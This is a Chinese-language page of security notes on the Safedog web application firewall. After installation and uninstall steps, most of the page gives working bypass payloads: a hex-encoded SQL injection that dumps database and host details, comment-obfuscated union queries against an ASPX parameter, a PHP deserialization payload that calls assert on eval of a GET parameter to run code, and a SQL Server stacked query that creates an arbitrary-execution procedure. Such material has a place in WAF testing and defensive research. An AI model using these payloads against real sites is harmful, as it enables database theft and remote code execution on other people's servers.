应用安全-安全设备-Waf系列-软Waf-安全狗（Safedog）

2020-7 - 联合查询绕过安全狗Pyload

group_concat(0x3C68343E42797061737320736563757269747920646F672073716C5F696E6A6563743C68343E,0x3C68723E,0x4D7953514C20506F72743A20202020,@@port,0x3C68723E,0x4D7953514C2076657273696F6E3A,@@version,0x3C68723E,0x4D7953514C5F696E7374616C6C5F706174683A2020,@@basedir,0x3C68723E,0x4D7953514C5F64617461626173655F706174683A20202020,@@datadir,0x3C68723E,0x43757272656E7420646174616261736520757365723A20202020,current_user,0x3C68723E,0x73797374656D2076657273696F6E3A20202020,@@version_compile_os,0x3C68723E,0x686F73746E616D653A20202020,@@hostname,0x3C68723E,0x43757272656E742064617461626173653A20202020,database/*!()*/,0x3C68723E,0x5573657220496E666F3A20202020,user/*!()*/)

 

安装 - Linux

下载
http://download.safedog.cn/safedog_linux64.tar.gz
wget http://download.safedog.cn/safedog_linux64.tar.gz

解压
tar xvf safedog_linux64.tar

运行
./install.py

卸载
进入安装包解压目录
chmod +x uninstall.sh
./uninstall.sh

安装 - Windows

下载
http://down.safedog.cn/download/software/safedogfwqV5.0.exe

使用指南

https://www.safedog.cn/download/software/safedogfwq_Windows_Help.pdf

https://www.safedog.cn/download/software/safedogfwq_linux_Help.pdf

 

绕过

规则缺陷绕过 - 搜索框 + 字符型SQL注入 +  IIS + ASPX + /**a*/

aspx?Pro=广x' and 1=1 --     #检测
aspx?Pro=广x' /**a*/and 1=1 --     #绕过

#遍历

aspx?Pro=广x' /**a*/union /**a*/select 1,2,3,4,5 --   
aspx?Pro=广x' /**a*/and 1=(select 1) --

 

PHP反序列化绕过

<?php 
class A{
    public $name;
    public $male;
    function __destruct(){
        $a = $this->name;
        $a($this->male);
    }
}
unserialize($_POST['un']);
?>

POST - un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";}

GET -  x=phpinfo(); --结合Hackbar使用

 存储过程 + SQLServer 绕过

?type=1;EXEC/*(*/student..sp_sqlexec 'CREATE PROCEDURE myexec(@s VARCHAR(1024)) as exec(@s)'